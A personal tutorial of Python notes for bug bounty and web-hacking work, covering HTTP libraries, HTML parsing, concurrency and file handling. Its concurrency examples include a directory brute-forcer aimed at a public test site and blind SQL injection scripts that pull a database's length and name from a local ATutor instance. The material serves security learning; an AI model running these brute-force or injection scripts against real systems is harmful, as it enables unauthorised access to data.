Python for Bug Bounty Hunters & Web Hackers

Sharing my personal notes that I took and the resources that I refered while I was preparing AWAE and learning about Python.

Check out my original Github Repository here: Python for AWAE

Objective

Learn and understand Python well enough that we can use it to automate our bug bounty tasks or create quick exploits whenever required.

Necessary Python Libraries

urllib2 (if python 2.x is in use)

Code to make a Simple GET Request using urllib2:

import urllib2 url = 'https://www.google.com/' response = urllib2.urlopen(url) # GET print(response.read()) response.close()

urllib (if python 3.x is in use)

Code to make a Simple GET Request using urllib:

import urllib.parse import urllib.request url = 'https://www.google.com/' with urllib.request.urlopen(url) as response: # GET content = response.read() print(content)

Code to make a Simple POST Request using urllib:

info = {'user':'blackhat', 'passwd':'1337'} data = urllib.parse.urlencode(info).encode() # data is now of type bytes req = urllib.request.Request(url, data) with urllib.request.urlopen(req) as response: # POST content = response.read() print(content)

Requests

  • It's not a part of the standard library, hence the installation is required.
  • Installation:
  • pip install requests
  • Importing:
  • import requests
  • Methods:
  • r = requests.get(url) r = requests.post(url, data={'key':'value'}) r = requests.put(url, data={'key':'value'}) r = requests.delete(url) r = requests.head(url) r = requests.options(url)
  • Print Request URL:
  • print(r.url)
  • Passing params in URLs via GET:
  • payload = {'key1': 'value1', 'key2': 'value2'} r = requests.get('https://httpbin.org/get', params=payload)
  • Passing a list of items:
  • payload = {'key1': 'value1', 'key2': ['value2', 'value3']} r = requests.get('https://httpbin.org/get', params=payload) print(r.url)
  • Get Response Content in binary form:
  • r.content
  • Get Response Content in json form:
  • r.json
  • Get raw response content:
  • r.raw.read(10)
  • Add custom header:
  • url = 'https://api.github.com/some/endpoint' headers = {'user-agent': 'my-app/0.0.1'} r = requests.get(url, headers=headers)
  • POST a multipart-encoded file:
  • url = 'https://httpbin.org/post' files = {'file': open('report.xls', 'rb')} r = requests.post(url, files=files) r.text
  • Sending our own cookies:
  • cookies = dict(cookies_are='working') r = requests.get(url, cookies=cookies) r.text
  • Others:
  • r.status_code # get status code r.headers # get response headers r.cookies # get cookies

lxml and BeautifulSoup packages

  • The lxml package provides a slightly faster parser, while the BeautifulSoup package has logic to automatically detect the target HTML page's encoding.
  • Installation:
  • pip install lxml pip install BeautifulSoup
  • Suppose we are having the HTML content from a request stored in a variable named content. Using lxml, we could retrive the content and parse the links as follows:
  • from io import BytesIO from lxml import etree import requests url = 'https://www.example.com' r = requests.get(url) content = r.content # content is of type 'bytes' parser = etree.HTMLParser() content = etree.parse(BytesIO(content), parser=parser) # Parse into > tree for link in content.findall('//a'): # find all "a" anchor elements print(f"{link.get('href')} -> {link.text}")
    Note: I tested this and I think it only works with python 3.6 or below
  • Same thing Using BeautifulSoup
  • from bs4 import BeautifulSoup as bs import requests url = "https://www.google.com" r = requests.get(url) tree = bs(r.text, 'html.parser') # Parse into tree for link in tree.find_all('a'): # find all "a" anchor elements print(f"{link.get('href')} -> {link.text}")

Python Multi-threading

I personally think that multi-processing is better as compared to multi-threaded python scripts. It's good to learn unless and until you wanna just sit and see each request going one by one wasting your time.

We usually use python `queue` for multi-threading coz it's thread-safe and doesn't cause race condition.

  • Here's a brute-forcing tool that'll help you understand multi-threading using queue.
  • import queue import threading import urllib.error import urllib.parse import urllib.request threads = 50 target_url = "http://testphp.vulnweb.com" wordlist_file = "all.txt" # from SVNDigger resume = None user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \ "Gecko/20100101 " \ "Firefox/19.0" def build_wordlist(wordlst_file): # read in the word list fd = open(wordlst_file, "r") raw_words = [line.rstrip('\n') for line in fd] fd.close() found_resume = False words = queue.Queue() for word in raw_words: if resume: if found_resume: words.put(word) else: if word == resume: found_resume = True print("Resuming wordlist from: %s" % resume) else: words.put(word) return words def dir_bruter(extensions=None): while not word_queue.empty(): attempt = word_queue.get() attempt_list = [] # check if there is a file extension if not # it's a directory path we're bruting if "." not in attempt: attempt_list.append("/%s/" % attempt) else: attempt_list.append("/%s" % attempt) # if we want to bruteforce extensions if extensions: for extension in extensions: attempt_list.append("/%s%s" % (attempt, extension)) # iterate over our list of attempts for brute in attempt_list: url = "%s%s" % (target_url, urllib.parse.quote(brute)) try: headers = {"User-Agent": user_agent} r = urllib.request.Request(url, headers=headers) response = urllib.request.urlopen(r) if len(response.read()): print("[%d] => %s" % (response.code, url)) except urllib.error.HTTPError as e: if e.code != 404: print("!!! %d => %s" % (e.code, url)) pass word_queue = build_wordlist(wordlist_file) file_extensions = [".php", ".bak", ".orig", ".inc"] for i in range(threads): t = threading.Thread(target=dir_bruter, args=(file_extensions,)) t.start()

Python Multi-Processing

Let's understand multi-processing using a script that'll help us retrieve database length using SQL

  • import multiprocessing as mp import requests target = "http://localhost/link/" def db_length(number): payload = f"te')/**/or/**/(length(database()))={number}#" param = {'q': payload} r = requests.get(target, param) content_length = int(r.headers['Content-length']) if content_length > 20: print(number) if __name__ == "__main__": print('[*] Retreiving Database Length: \n[*] Database length: ', end=' ') processes = [] for number in range(30): p = mp.Process(target=db_length, args=[number]) p.start() processes.append(p) for process in processes: process.join()

Python concurrent.futures

This one is the GOAT. Less code, more capability.

import requests import concurrent.futures target = "http://localhost/atutor/" final_string = {} def db_length(number): payload = f"te')/**/or/**/(length(database()))={number}#" param = {'q': payload} r = requests.get(target, param) content_length = int(r.headers['Content-length']) if content_length > 20: return number def atutor_dbRetrieval(l): for j in range(32, 256): payload = f"te')/**/or/**/(select/**/" payload += "ascii(substring(database(),{l},1))={j})#" param = {'q': payload} r = requests.get(target, param) content_length = int(r.headers['Content-length']) if content_length > 20: final_string[l-1] = chr(j) print(''.join(final_string[i] for i in sorted(final_string.keys()))) if __name__ == "__main__": print('[*] Retreiving Database Length: \n[*] Database length: ', end=' ') db_len = 0 with concurrent.futures.ProcessPoolExecutor() as executor: results = [executor.submit(db_length, _) for _ in range(30)] for f in concurrent.futures.as_completed(results): if f.result() != None: db_len = f.result() print(db_len) print("[+] Retrieving Database name: ....") with concurrent.futures.ThreadPoolExecutor() as executor: results = [executor.submit(atutor_dbRetrieval, index) for index in range(db_len+1)] print("[+] Database Name: ", end=" ") print(''.join(final_string[i] for i in sorted(final_string.keys()))) print("[+] Done")

Using python to navigate file system

OS Module

Note: Python OS Module can be used to navigate through the file system.
+ os.getcwd() + os.chdir() + os.listdir() + os.mkdir() + os.makedirs() + os.rmdir() + os.removedirs() + os.rename(, ) + os.stat() + os.walk() + os.environ + os.path.join(, ) + os.path.basename() + os.path.dirname() + os.path.exists() + os.path.splitext() + dir(os) => get curret working directory => change directory => list directory => create a directory => make directories recursively => remove directory => remove directory recursively => rename file => print all info of a file => traverse directory recursively => get environment variables => join path without worrying about / => get basename => get dirname => check if the path exists or not => split path and file extension => check what methods exists

Using python to read and write files

  • Reading a file
  • with open('test.txt', 'r') as f: f_contents = f.read() print(f_contents)
  • Get all lines into a list
  • with open('test.txt', 'r') as f: f_contents = f.readlines() print(f_contents)
  • Read 1 line at a time
  • with open('test.txt', 'r') as f: f_contents = f.readline() print(f_contents)
  • Reading file efficiently
  • with open('test.txt', 'r') as f: for line in f: print(line, end='')
  • Going back to the start of the file
  • with open('test.txt', 'r') as f: for line in f: print(line, end='')
  • Writing to a file
  • with open('test2.txt', 'w') as f: f.write('Test')
    Note: `w` will overwrite the file, so use `a` if you wanna append
  • Appending to a file
  • with open('test2.txt', 'a') as f: f.write('Test')
  • Read and write to a file at the same time
  • with open('test.txt', 'r') as rf: with open('test_copy.txt', 'w') as wf: for line in rf: wf.write(line)

Conclusion

As per my experience, with this much knowledge of python - you can write almost all automation scripts you'll ever require while doing bug bounties and web hacking.

Reach me out!

Email Me Here

chavhanshreyas@gmail.com

Wanna paypal me?

paypal.me/shreyaschavhan